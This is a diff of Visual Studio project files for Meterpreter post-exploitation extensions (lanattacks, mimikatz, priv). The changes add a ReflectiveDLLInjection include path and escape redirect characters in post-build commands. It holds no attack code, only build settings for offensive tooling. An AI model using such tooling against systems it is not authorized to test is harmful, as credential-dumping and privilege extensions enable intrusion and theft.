<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -501,4 +509,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj
View File

@ -128,7 +128,7 @@
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -159,7 +159,7 @@
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -171,7 +171,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@ -202,7 +202,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -217,7 +217,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
@ -236,7 +236,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -251,7 +251,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
@ -270,7 +270,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -282,7 +282,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -313,7 +313,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -325,7 +325,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -356,7 +356,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -371,7 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -406,7 +406,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -421,7 +421,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -456,7 +456,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -495,4 +495,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj
View File

@ -181,7 +181,7 @@
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
@ -213,7 +213,7 @@
<ImportLibrary>$(OutDir)\ext_server_mimikatz.lib</ImportLibrary>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -230,7 +230,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>false</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
@ -262,7 +262,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportLibrary>$(OutDir)\ext_server_mimikatz.lib</ImportLibrary>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -273,7 +273,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -312,7 +312,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -323,7 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -362,7 +362,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -383,7 +383,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -400,7 +400,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -421,7 +421,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -438,7 +438,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -452,7 +452,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -492,7 +492,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -506,7 +506,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -546,7 +546,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -685,4 +685,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

34
c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
View File

@ -151,7 +151,7 @@
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -192,7 +192,7 @@
<OutputFile>$(OutDir)\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -212,7 +212,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -253,7 +253,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -273,7 +273,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -313,7 +313,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<OutputFile>$(OutDir)\ext_server_priv.bsc</OutputFile>
</Bscmake>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -333,7 +333,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
